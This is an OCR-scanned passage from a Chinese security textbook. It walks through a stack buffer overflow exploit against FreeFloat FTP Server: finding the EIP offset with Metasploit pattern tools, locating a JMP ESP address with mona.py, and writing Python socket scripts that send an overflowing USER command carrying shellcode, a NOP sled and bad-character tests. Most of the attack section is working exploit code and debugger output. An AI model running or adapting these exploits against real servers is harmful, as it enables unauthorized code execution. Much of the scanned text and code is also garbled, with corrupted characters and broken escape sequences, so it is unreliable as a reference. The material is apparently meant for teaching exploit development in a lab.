无 法 再 继续 下 去 了。 按照 我 们 之 前 讲 过 的 知识 ， 出 现 这 种 情况 的 原因 是 
原本 保存 下 一 条 地 址 的 EIP 寄 存 需 中 的 地 址 被 溢出 的 字符 “A>” 所 窗 
六 。“\Wx41” 在 ASCII 表 中 表示 的 正 是 字符 “A”， 也 就 古 说 现在 EIP 宫 存 右 
中 的 内 容 束 是 “AAAA”， 而 操作 系统 无 法 在 这 个 地 址 找到 一 条 可 以 执行 
Hag. Mg sl A SS BB o 


W, MERI NEHA HA NEPRE, (HzETKRSEADBE 
FFAESRTE Z8 EHI HUAVT TES. EE wE ARAA RAFAT PTAT 
AEAEE MEI. Hr ARATE ris AE A E EIPRE Xa, 
而 是 EIP 相 对 输入 数据 起 始 位 置 的 相对 位 移 。 


如 打 这 个 位 移 的 值 不 大 的 话 ， 我 们 可 以 用 逐步 答 试 的 方法 获取 这 个 
值 。 但 是 如 果 位 移 比 较 大 的 话 ， 我 们 还 是 需要 使 用 到 一 些 工 具 来 提高 效 
深 ， 例 如 这 里 我 们 束 可 以 借助 Metasploit 中 内 置 的 两 个 工 上 其 pattern_create 
和 Ppattern_offset 来 完成 这 个 任务 。 


这 两 个 工具 各 目 具 有 目 己 的 功能 ，pattern_create 可 以 用 来 创建 一 段 
没有 重复 字符 的 文本 ， 我 们 将 这 段 文本 友 送 到 目标 服务 右 ， 当 发 生 洲 出 
时 ， 记 录 下 程序 发 生 错 误 的 地 址 《也 惑 是 EIP 中 的 内 容 ) ， 这 个 地 址 其 
实 束 是 文本 中 的 四 个 字符 。 然 后 我 们 可 以 利用 pattern_offset 快 速 地 找到 
这 4 个 字符 在 文本 中 的 偏 移 量 ， 而 这 个 偏 移 量 就 是 EIP 守 存 人 如 的 地 址 。 


好 了 ， 我 们 现在 先 来 演示 一 下 这 个 过 程 。 背 先 局 动 kali 虚 拟 机 ， 打 
开 一 个 终 问 ， 然 后 切换 到 Metasploit 的 目录 : 


root@kali:cd /usr/share/metasploit-framework/tools/exploit 


然后 在 这 个 目录 中 执行 工具 pattern_create.rb, 这 是 一 个 由 ruby 语 言 编 
写 的 脚本 。 


root(kali:/usr/share/metasploit-framework/tools/exploitit ./pattern create. 
rb 


如 果 你 想 了 解 这 个 工具 的 使 用 方法 ， 可 以 使 用 参数 -h 来 显示 所 有 可 
以 使 用 的 参数 以 及 它 们 的 用 法 ， 如 图 11-14 所 示 。 


# ./pattern create.rb -h 


: ./pattern create.rb [options] 


: ./pattern create.rb -L 50 -s ABC,def,123 


, --length «length» The length of the pattern 
, --Sets <ABC ,def ,123> Custom Pattern Sets 
, --help Show this message 





图 11-14 ”使 用 pattern_create.rb 


图 11-14 中 给 出 了 这 个 工具 的 用 法 ， 其 中 最 为 常用 的 参数 是 -]|， 这 个 
参数 可 以 用 来 指定 生成 字符 串 的 长 度 ， 下 和 面 我 们 来 生成 一 段 500 个 字符 
的 文本 ， 如 图 11-15 所 示 。 


3 ./pattern create.rb -l 

500 
Aa0Aal1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9AcOAc1AC2AC3ACAAC5AC 
6Ac7AC8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae 1A4e2Ae3Ae4Ae5Ae6Ae7Ae8Ae9AfOAT 1AT2A 
f3AfAATSAT6AT7ATSAf9Ag0Ag1Ag2A93Ag4A95A96A9g7A98A99Ah0Ah 1A4h2Ah 3Ah4Ah5Ah6Ah7Ah8Ah9 
Ai10AilAi2Ai3Ai4A15A16Ai7A18A19Aj0Aj 1Aj2Aj 3Aj4Aj5Aj6Aj 7Aj 8A j 9AKOAK1AK2AK3AKAAKS5AK 
6AK7AK8AK9A10AL1A12A13A14A15A16A17A18A19AmOAm1Am2Am3Am4Am5Am6Am7Am8Am9AnOAn 1An2A 
n3An4An5An6An7An8An9A00A01A02A03A04A05A06A07A08A09Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9 
Aq0Aq1Aq2Aq3Aq4Aq5Aq 


图 11-15  fiHjpattern create.rbp ^ ^E J& EZ 73500] FITE 


然后 我 们 使 用 这 个 pattern_ create. rb 产生 的 字符 来 代 蔡 那些 <A”。 仍 
然 使 用 前 面 那 段 连接 目标 服务 器 的 python 脚 本 将 这 个 内 容 发 送出 去 。 





s.send('USER Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9AbOAb1Ab2Ab3AbA4Ab5Ab6Ab7AbS8Ab9A 
COAC1AC2AC3ACAAC5AC6AC7AC8AC9AdOAd1Ad2Ad3AdAAd5Ad6A207A08Ad9A6e0Ae 1Ae2Ae3Ae4A 
Ae5Ae6Ae7Ae8Ae9AfOAf1Af2Af3AfAAfSAfGAf7AfSAf9AgOAg1Ag2Ag3AgAAg5Ag6Ag 7Ag8Ag 


9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9A10Ai11A12A13A14A15A16A17A18A19A3j0Aj1Aj2Aj3A 
j4^j5A3j6Aj7^j8Aj9AkOAk1Ak2Ak3AKAAK5AK6AK7AK8AK9A10A11A12A13A14A15A16A17A18 
Al9AmOAm1Am2Am3Am4Am5Am6Am7Am8Am9AnOAn1An2An3An4An5An6An7An8An9A00A01A02A0 
3A04A05A06A07A08A09Ap0Ap1Ap2Ap3ApA4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5AqN rn ' ) 





好 了 ， 可 以 看 到 如 图 11-16 所 示 的 报错 信息 ， 这 个 FreeFloat FTP 
Server {kF AARAA S o 





图 11-16  H bk HEUXHR ds 


我 们 记 下 提示 信息 中 的 地 址 “37684136”， 然 后 使 用 pattern_offset 来 
查找 这 个 值 对 应 的 偏 移 量 。 启 动 pattern_offset 的 方法 和 之 前 的 
pattern_create 几 乎 是 一 样 的 ， 如 果 你 之 前 没有 切换 到 metasploit 的 目录 ， 
HRA SL mi EAT e 


root@kali:cd /usr/share/metasploit-framework/tools/exploit 


然后 在 这 个 目录 中 执行 工具 pattern_offset.rb, 这 也 是 一 个 由 ruby 语 言 
编写 的 脚本 。 


root(Qkali:/usr/share/metasploit-framework/tools/exploiti ./pattern offset. 
rb 


同样 可 以 使 用 参数 -h 来 查看 参数 帮助 。 


我 们 使 用 参数 -qg 加 上 湾 出 的 地 址 值 ， 使 用 -] 来 指定 字符 串 的 长 虔 
(Le Bjpattern create.rb 所 使 用 的 参数 ， 也 束 是 500) 。 


ern offset.rb [options 
: ./pattern offset.rb -q Aa 
*| Exact match at offset 9 


uery Aa0A 
ength «length 


EE <length> 
-S, --Sets «ABC,def,123» 
, --help 





37684136 -l 500 
[*] Exact match at offset 230 


图 11-18 ”使 用 pattern_offset.rb 来 查找 溢出 的 地 址 


现在 我 们 成 功 找到 了 EIP 寄 人 存 硕 的 位 置 。 而 这 个 寄存 部 中 的 值 雇 定 
了 程序 下 一 步 的 执行 位 置 ， 到 此 我 们 已 经 成 功 了 一 大 半 了 。 


好 了 ， 现 在 我 们 同 目 标 友 壕 能 够 导致 系统 洲 出 到 EIP 的 数据 ， 之 十 


我 们 已 经 计算 出 EIP 的 偏 移 量 是 230， 那么 现在 提供 了 230 个 字符 “A” 即 
可 ， 之 后 束 是 4 个 “B”。 


importsocket 
buff = "\x41"*230+"\x42"*4 
target = “192.168.1.106” 


s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 
s.connect((target,21)) 

s.send("USER "+buff+"\r\n") 

s.close() 





然后 我 们 仍然 重复 之 前 的 步骤 ， 在 虚拟 机 中 打开 *EreeFloat FTP 
Server”， 然 后 执行 上 面 的 脚本 ， 可 以 看 到 程序 已 经 朋 深 。 如 图 11-19 所 
示 ， 显 示 骨 省 的 地 址 是 “42424242”， 这 说 明 EIP 中 的 地 址 已 经 被 更 改 为 
了 字符 “B”, 这 验证 了 我 们 之 前 找到 的 偏 移 地 址 的 正确 性 。 


e Don't know how to continue because 





图 11-19 Jim HH iÉ*42424242" 


11.3 ”查找 JMP ESP 指 令 


但 是 这 里 其 实 还 是 有 一 个 问题 ， 融 是 即 使 我 们 控制 了 EIP 中 的 内 
容 ， 但 是 之 前 我 们 已 经 看 到 了 任何 的 一 个 程序 在 每 一 次 执行 时 ， 操 作 系 
统 痢 会 为 其 分 配 个 同 的 地 址 。 所 以 我 们 即使 可 以 决定 程序 下 一 步 执 行 的 
地 址 ， 但 是 却 并 不 知 妃 我 们 的 恶意 攻击 载 厨 位 于 哪个 位 置 ， 还 是 没有 办 
法 让 目标 服务 右 执 行 这 个 恶意 的 攻击 载 谷 。 


接 下 来 我 们 就 要 想 一 个 办 法 ， 让 这 个 EIP 中 的 地 址 指 回 我 们 的 攻击 
载 和 柯 ， 这 里 我 们 先 来 看 一 下 输入 的 用 户 名 数据 在 执行 时 是 如 何 分 布 的 ， 
如 图 11-20 所 示 。 


=|| = Ji | 
图 11-20 程序 在 和 内存 中 的 分 布 


按照 栈 的 设计 ，ESP 寄 存 嚣 应 该 就 位 于 EIP 寄 存 右 的 后 面 〈 中 间 可 
能 有 一 些 空隙 ) ， 如 图 11-21 所 示 。 那 么 这 个 寄存 器 就 是 我 们 最 理想 的 
选择 ， 一 来 我 们 在 使 用 大 量 字 符 来 溢出 栈 的 时 候 ， 也 可 以 使 用 特定 字符 
来 覆盖 ESP， 二 来 我 们 虽然 无 法 对 ESP 寄 存 器 进行 定位 ， 但 是 可 以 利用 
一 条 “JMP ESP” 的 跳 转 指令 来 实现 跳 转 到 当前 ESP 寄 存 右 。 
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到 EIP 的 偏 移 量 Miss ipur| 填充 数据 | 攻击 模块 | 《< ! | 被 我 们 构造 数据 修改 语 的 内 在 分 布 | 


图 11-21 接收 了 我 们 数据 之 后 程序 的 内 存 分 布 
我 们 接 下 来 的 工作 就 是 要 找到 一 条 地 址 不 会 友 生 改变 的 “JMP 


ESP” 指 令 ，ntdll.dll (NT Layer DLL? 是 Windows NT 操作 系统 的 重要 模 
块 ， 属 于 系统 级 别 的 文件 。 用 于 堆栈 和 释放、 进程 管理 。kernel32.dl] 是 
Windows 9x/Me 中 非常 重要 的 32 位 动态 链接 库 文 件 ， 属 于 内 核 级 文件 。 
它 控制 着 系统 的 内 存 管理 、 数 据 的 输入 输出 操作 和 中 断 处 理 ， 当 
Windows 局 动 时 ，kernel32.dl1 束 驻 留 在 内 存 中 特定 的 写 保护 区 域 ， 使 别 
的 程序 无 法 占用 这 个 内 存 区 域 。 


一 些 经 党 被 用 到 的 动态 链接 库 会 极 映 射 到 内 存 ， 如 kernel.32.dl、 
user32.dl 会 被 几乎 所 有 进程 加 载 ， 且 加 载 基 址 始终 相同 〈 不 同 操 作 系 统 
上 可 能 不 同 ) 。 我 们 现在 只 需要 在 这 些 动态 链接 库 中 找到 “MP ESP” 命 
令 就 可 以 了 。 找 到 的 “JMP ESP” 的 地 址 是 一 直 都 不 会 变 的 。 


这 里 面 我 们 还 需要 使 用 到 Immunity Debugger， 但 是 这 个 工具 本 刁 并 
没有 提供 俘 找 “JMP ESP” 命 令 的 功能 ， 我 们 需要 信 助 一 个 使 用 python 纺 
写 的 插件 来 完成 这 个 任务 ， 这 个 插件 就 古 “Mona.py”， 你 可 以 从 
https://github.com/corelan/mona 下 载 它 。 


Mona.py 的 使 用 方法 也 很 简单 ， 你 只 需要 将 下 载 好 的 这 个 插件 复制 
到 Immunity Debuggerzz?& H 3€ T HJPyCommands x: ff 3e rp Wè n] LE Hj 
了 。 然 后 我 们 在 Immunity Debugger 的 命令 行 中 输入 “Imona” 命 令 ， 如 网 
11-22 所 示 。 


* Immunity Debugger - FIPServer.exe - [CPU - thread Q0000EEC, module ntdll] 
[c] File View Debug Plugins ImmLib Options "Window Help Jobs 
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多 11-22 在 Immunity Debugger" Hi z/) mona 
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一 个 “Log data” 窗 口 ， 如 图 11-23 所 示 ， 里 和 面 给 出 了 mona.py 的 介绍 和 使 
用 方法 。 


我 们 在 命令 行 中 执行 “!Imonajmp -r esp” 来 查找 “JMP ESP” 命 令 ， 执 行 
的 结果 如 图 11-24 所 示 。 
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图 11-23 ”mona.py 的 工作 界面 


"C30390r 
"C3036EB 
"CSD38FF 


BE EE BOB 
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图 11-24 ”使 用 mona.py 查 找到 的 人 MPESP” 命 令 


可 以 看 到 这 里 找到 了 很 多 条 可 以 使 用 的 指令 ， 这 些 指令 主要 来 源 于 
SHELL32.dll、GDI32.dll、ADVAPI32.dll， 这 里 面 我 们 选择 第 一 条 指令 
来 作为 跳 转 指令 ， 这 里 需要 记录 下 地 址 “7C9D30D7”。 


11.4 编写 渗透 程序 


这 里 面 的 地 址 存在 一 个 问题 ， 同 样 的 一 个 地 址 数据 在 网 络 传输 和 
CPU 存储 时 的 表示 方法 是 不 同 鸭 ， 这 里 有 一 个 大 闫 和 小 端的 概念 ， 大 痪 
(Big-Endian) ~ ^5 CLittle-Endian? 以 及 网 络 字 节 序 的 概念 在 编程 中 
经 党 会 遇 到 ， 其 中 网 络 字 节 序 (Network Byte Orden 一 般 是 指 大 端 〈Big- 
Endian， 对 大 部 分 网 络 传输 协议 而 言 ) 传输， 大病、 小 闪 的 概念 是 面 加 
多 字 节 数据 关 型 的 存储 方式 定义 的 ， 小 闪 融 是 低位 在 前 《低位 字 节 存在 
内 存 低地 址 ， 字 而 高 低 顺 序 和 内 存 高 低地 址 顺序 相同 ) — Ct oe ren 
在 前 《其 中 “前 ”是 指 靠近 内 存 低 地 址 ， 存 储 在 硬盘 上 就 是 先 写 那个 字 
CHO 。 概 念 上 字 节 序 也 叫 主 机 序 。 


这 里 我 们 在 使 用 python 编 程 向 目标 发 送 “JMP ESP” 指 令 的 地 址 时 使 
用 的 是 大 端 格式 ， 而 当前 的 地 址 “7C9D30D7” 其 实 是 小 端 格 式 ， 两 者 需 
要 进行 调整 。 如 果 我 们 希望 使 用 "7C9D30D7” 来 覆盖 目标 地 址 ， 在 使 用 
Python 编写 渗透 程序 的 时 候 就 需要 使 用 倒置 的 地 
HE“/xD7/x30/x9D/x7C” .- 


好 了 ， 现 在 我 们 问 目标 发 送 能 够 导致 系统 溢出 到 EDP 的 数据 ， 之 前 
我 们 已 经 计算 出 EIP 的 偏 移 量 是 230， 那 么 现在 提供 230 个 字符 “A? 即 可 ， 
之 后 就 是 xD7\AX30\X9DNX7C>”。 


import socket 
buff = "Ax41"*230-*" NXXD7NXx30Nx9DNx7C^" 
target = '"192.168.1.106" 


s-socket.socket(socket.AF INET,socket.SOCK STREAM) 
s.connect((target,21)) 

s.send("USER "+buff+"\r\n") 

s.close() 





然后 我 们 仍然 重复 之 前 的 步骤 ， 在 虚拟 机 中 打开 “FreeFloat FTP 
Server”， 然 后 执行 上 面 的 脚本 ， 观 察 调试 器 中 的 提示 ， 找 到 洲 出 的 地 
址 ， 如 图 11-25 所 示 。 
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图 11-25 ”找到 次 出 的 地 址 


好 了 ， 是 不 是 看 起 来 胜利 束 在 眼前 了 ， 按 照 我 们 之 前 的 设计 ， 现 在 
icis 得 在 目标 计算 机 上 执行 的 代码 添加 上 去 即 可 。 下 面 我 们 来 编 
一 段 可 以 在 目标 计算 机 启动 一 个 计算 器 的 脚本 : 


"\xdb\xcO\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" 
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" . 
"\X78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" 
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" . 
"\X60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\xð05\x6b" . 
"\XFfO\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" 


"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" 
"\x1f\x57\x53\x64\x51\xal\x33\xcd\xf5\xc6\xf5\xcl\x7e\x98" . 
"\xXf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" . 
"\xb6\xOe\x2f\x85\x19\x87\xb7\x78\x2f\x59\x96\x7b\xd7\x85" 
"AX7fNxe8Nx7bNxca"; 
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buff = "WMx41"*230-" NXD7Nx30Nx9DWNx7C" 
shellcode-2"MxdbNxcONx31Nxc9NxbfNx7cNx16Nx70NxccAxd9Nx74Nx24NxfANxb1 " 
shellcode+="\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" 
shellcode+="\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" 
shellcode+="\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" 
shellcode+="\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" 
shellcode+="\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" 
shellcode+=" \xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" 
shellcode+="\XxX1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" 
shellcode+="\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" 
shellcode+="\xb6\xð0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\xX90\x7b\xd7\x05" 
shellcode+="\x7f\xe8\x7b\xca" 

buff+=shellcode 

target = “192.168.1.106” 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 
s.connect((target,21)) 

s.send("USER "+buff+"\r\n") 

s.close() 


执行 这 段 脚 本 之 后 ， 目 标 系 统 的 “FreeFloat FTP Server" jiii f , 1H 
是 却 疫 有 局 动 计 算 喜 程序 ， 这 是 为 什么 呢 ? 我 们 还 是 局 动 Immunity 
Debugger 来 调试 一 下 ， 可 以 看 到 这 里 之 前 的 命令 都 执行 成 功 了 ， 但 是 
ESP 的 地 址 癌 后 发 生 了 偏 移 ， 这 样 束 导 八 了 shellcode 的 代码 并 没有 全 部 
载 入 到 ESP 中 ， 最 前 面 的 一 部 分 在 ESP 的 外 面 ， 这 样 束 会 导 仅 即使 我 们 
控制 了 程序 ， 但 是 由 于 ESP 中 只 有 一 部 分 Shellcode， 因 此 执行 的 时 候 缺 
失 了 一 部 分 ， 从 而 导致 程序 不 能 够 正 利 执行 。 


那么 我 们 该 如 何 解雇 这 个 问题 呢 ? 解决 的 方法 就 是 一 个 特殊 的 指 
令 Ax90”。‘\x90” 其 实 就 是 NOPS， 也 就 是 空 指令 ， 这 个 指令 不 会 执行 任 
何 的 实际 操作 。 但 是 它 也 是 一 条 指令 ， 因 此 会 顺序 地 回 下 执行 ， 这 样 我 
们 即使 并 不 知道 ESP 的 真实 地 址 ， 只 需要 多 在 EIP 后 面 汪 加 一 些 空 指 
令 ， 只 要 这 些 容 指 令 足 够 多 到 将 shellcode 偏 移 进 了 ESP， 束 可 以 顺利 执 
行 shellcode。 


比如 说 ， 我 们 现在 向 程序 中 添加 20 个 ^x90”， 修 改 后 的 代码 如 下 所 


a 
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import socket 

buff = "NXx41"*230-" XXD7NX30NxX9DNX7C" +” Ax90" *20 
shellcode-z"WMxdbNxcONx31Nxc9NxbfNx7cNx16Nx70NxccAxd9Nx74Nx24NxfANxb1 " 
shellcode+="\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" 
shellcode+="\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" 


shellcode+="\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" 
shellcode+="\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" 
shellcode+="\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" 
shellcode+=" \xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" 
shellcode+=" \x1f\x57\x53\x64\x51\xal\x33\xcd\xf5\xc6\xf5\xc1l\x7e\x98" 
shellcode+="\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" 
shellcode+="\xb6\xð0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\xX90\x7b\xd7\x05" 
shellcode+="\x7f\xe8\x7b\xca" 

buff+=shellcode 


target = "192.168.1.106" 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 
s.connect((target,21)) 

s.send("USER "+buff+"\r\n") 

s.close() 
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二 Python Shell f- Ex] test1.py - C:Documents and Settings/Administrator/Desktop/test1. py 
File Edit Format Run Options Windows Help 





Python 2.7.1 (r271:86832, Nov 27 2010, 18:30:46) [MSC v.1500 32 bit (Intel)] on import socket 
winds buff = "ix41"*230-4" xD7 x30V x9DVx7C" A" x90" *20 

ell e="\ xdb xcO' x31* xc9* xb£* x 7e x 16V x 70 xece xd9* x 74 x24 x £4 xb1" 
e+=""\xle\ x58 x31 x 78 x 13$ x83 xe B x £c x03 x 78 x 68 x £4 x 85x x30" 
e+="\ x 783 xbe' x65 xc9*$ x 78$ xb6* x23V x £53 x £3 xb4'$ xaey x 7d x023 xaa" 
code-4-2" x3aV x32 x 1c xbf£V x62 xed'y x 1d x 54V xd5' x66 x29 x21 xe7 x96" 
code+="\ x60 x £5 x 71V xcaV x06 x35 x £53 x 14 xc 7 x 7C x fb x 1b x05 x 6b" 
code--2"' x £0 x27 xdd' x 485 x £d x22 x38 x 1b xa2' xe8*5 xc3 x £7 x3b x 7a" 
code-4-2"' xef x4c x 4£$ x23 xd3 x53 xad x 57 x £7 xd8* x3b x83 x8e' x83" 
code+="\ xifx57X x53 x64 x51 xal x33 xcd x £53 xc6 x £5h xci x 7e x98" 
e+="\ xf53 xaa' x £1) x05) xai x2 63 x993 x3d x3b* xcO' xd9* x£eV x51 x61" 
e+="\ xb6*3 x0Oe'* xzf x85V x19 x87 xb 7 x 78 x2 £ x 593 x90 x 7b xd 7 x05" 
code-F-"x"7f'xe8'* x7bY xca" 
T-shellcode 


target "192.168.1.106" 


.Socket(socket.ÀF INET,socket.SOCK STREAM) 
Ss.connect((target,21)) 

b) EEG JC JE] ea "ipei cu 

05) EJEJBJC JUS] 

四 相国 四 四 


eg 

= 

= 
A n Q (T E r ae 
oo ooo 
nunc LL DL, utu 


图 11-26 PÍT ETE E AIT RAET COZMA P Hb EAD 


11.5 AERA BS XE 


虽然 上 面 的 漏洞 渗透 程序 编号 得 很 成 功 ， 但 是 在 实际 中 却 未 必 如 此 
顺利 。 即 使 所 有 需要 的 量 都 计算 得 很 准确 ， 后 来 加 入 的 shellcode 却 未 必 
能 执行 成 功 。 要 注意 上 面 实例 中 我 们 输入 的 230 个 A、“JMP ESP” 的 指令 
地 址 以 及 要 执行 的 Shellcode 的 内 容 都 是 以 FTP 的 用 户 名 的 形式 输入 的 ， 

也 就 是 说 其 实 上 面 的 所 有 内 容 都 是 FTP 的 用 户 名 。 但 是 FTP 对 用 户 名 是 
有 限制 的 ， 并 非 所 有 的 字符 都 可 以 出 现在 用 户 名 中 。 如 果 我 们 的 内 容 中 
包含 了 这 种 不 个 允许 的 字符 ， 束 可 能 导致 FIP 服 务 占 拒绝 接收 后 面 的 内 
容 ， 从 而 导致 代码 只 传送 了 一 部 分 。 但 是 每 个 程序 ， 甚 至 每 个 程序 的 入 
口 接收 的 规则 都 不 一 样 ， 我 们 很 难 直 接 指 出 哪些 是 坏 字 符 ， 但 是 我 们 可 
以 使 用 逐个 测试 的 方法 找 出 这 些 字 符 。 下 面 列 出 了 所 有 的 可 能 的 字符 。 


"AX00NX01Nx02NX03NX0ANXO5BNXO6NX0O7NX0O8Nx09Nx0OaNxobNxocNxodNxoeNxo f NX10NX11N 
xX12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 
"\X20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\ 
X32NX33NX34NX35NX36NX37NX38NX39NMx3aNx3bNx3cNAx3dNx3eNx3f" 
"AXAONXAT1NX42NX43NX4A4NXA45NX46NX47NX48NxX49NMX4aNXAbNX4CNX40 NX4e NXATFNX50NX51N 
X52\XxX53\xX54\xX55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 
"\X60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\ 
X72NX73NX7A4NX75NX76NX77NX78NX79NX7aNX7bNx7cNx7dNx7eNx7ft" 
"AX80NX81NX82NX83NX84NX85XNX86NX87NX88Nx89Mx8aNx8bNx8cNx8d NXx8eNx8fTNx90NXx91N 
X92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 
"AxaeNXxad1Nxa2Nxa3NxadNxabNxaoNxa7NXa8Mxa9NxaaNxabNxacNxadNxaeNxa f NXbONxb1N 
Xb2Nxb3NxbANxb5Nxbe6Nxb7Nxb8Nxb9NxbaNxbbNxbcNxbaNxbeNxbft" 
"AXCONXC1NXC2NXC23NXCANXCBNAXCONXC7NXC8MxXc9AxcaNxcbNxccNAxcdNxceNxcfNxdoAxdi1N 
xd2Nxd3NxdANxd5NxdeNxd7Nxd8Nxd9NxdaNxdbNxdcNxddNxdeNxdft" 
"\xeð0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xfO\xf1\ 
xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 





以 前 昭 用 的 方法 是 将 这 些 字 符 一 个 一 个 地 进行 答 试 ， 然 后 找 出 其 中 


的 坏 字 符 。 这 种 方法 效率 其 实 十 分 低下 ， 我 们 可 以 使 用 一 些 工具 《例如 
mona.py) 来 完成 这 个 任务 。 但 是 出 于 学 习 的 目的 ， 我 们 使 用 这 种 逐个 
答 试 的 方法 可 以 更 容易 地 和 擎 握 模 块 编 与 的 原理 。 我 觉得 一 本 好 的 书 更 应 
该 授 之 以 渔 ， 你 觉得 呢 ? 首先 我 们 还 是 回头 看 一 下 我 们 之 前 编写 的 那个 
用 来 连接 服务 右 的 程序 。 


import socket 

Offset to eip= 230 

buffer = "A" * offset to eip 
buffer += "BBBB" 


buffer += "A" *50 

S = socket.socket(socket.AF INET,socket.SOCK STREAM) 
connect - s.connect(('192.168.1.106',21)) 

response = s.recv(1024) 

s.send('USER ' + buffer + '\r\n') 





首先 我 们 局 动 Immunity Debugger， 接 下 来 我 们 将 这 个 “FreeFloat 
FTP Server 的 进程 附加 到 Immunity Debugger 。 


当 我 们 运行 这 个 程序 的 时 候 , *FreeFloat FTP Server f£ FF 4s BB 1», 
在 Immunity Debugger 奏 看 ， 可 以 看 到 如 图 11-27 所 示 的 结 末 ， 用 鼠标 找 
到 42424242 所 在 的 位 置 。 


41414141 AAAA 
41414141 AAAA 





41414141 AARAA 
dd OUUU 
dzd24-7423 EEEE 
SITITICGI HHHH 
41414141 AAAA 
41414141 BAAA 

414141 各 有 


: ”hscII "USER hhhphhhhhahhhhhhphhhhhphbhhhhhhhhhhphhhhhhhhhhhhphh 
se RETURM 
„BE! ntdll.FC30E90A 
LBE! ntdll.TC91B81CB 
Be! RETURN to nti 


! RETURM to ntdLL ESGD26C 
ETURH to mswsock .riASS3606 From 


q R 


图 11-27 找到 用 户 名 的 输入 位 置 


好 了 ， 其 实 之 前 我 们 已 经 讨论 过 这 个 问题 了 ，“BBBB” 现 在 所 在 的 
位 置 束 古 EIP 指 针 的 位 置 ， 它 后 面 的 位 置 束 是 我 们 要 放置 坏 字 符 的 位 
置 。 下 面 我 们 来 修改 上 面 的 那 段 程序 ， 在 *BBBB” 的 后 面 深 加 所 有 的 字 
件 ， 修 改 后 的 程序 如 下 所 示 。 


t!/usr/bin/python 

import socket 

badchars = ("NXx00Nx01Nx02Nx03Nx04Nx05Nx06Nx07Nx08Nx09Nx0aNxobNxocNxodNxoeN 
XOf\XxX10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 
"\X20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\ 
X32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 
"\X41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\xX51\x52\ 
X53 \XxX54\xX55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\ 
X72NX73NX7A4NX75NX76NX77NX78NX79NxX7aNX7bNx7cNx7dNx7eNx7ft" 
"AX80NX81NX82NX83NX84X4X85XNX86NX87NX88MxX89MXx8aNxX8bNX8C NX8dNXx8e Nx8fT NX90NX91N 
X92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 
"\xað0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xbð0\xb1\ 
xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 
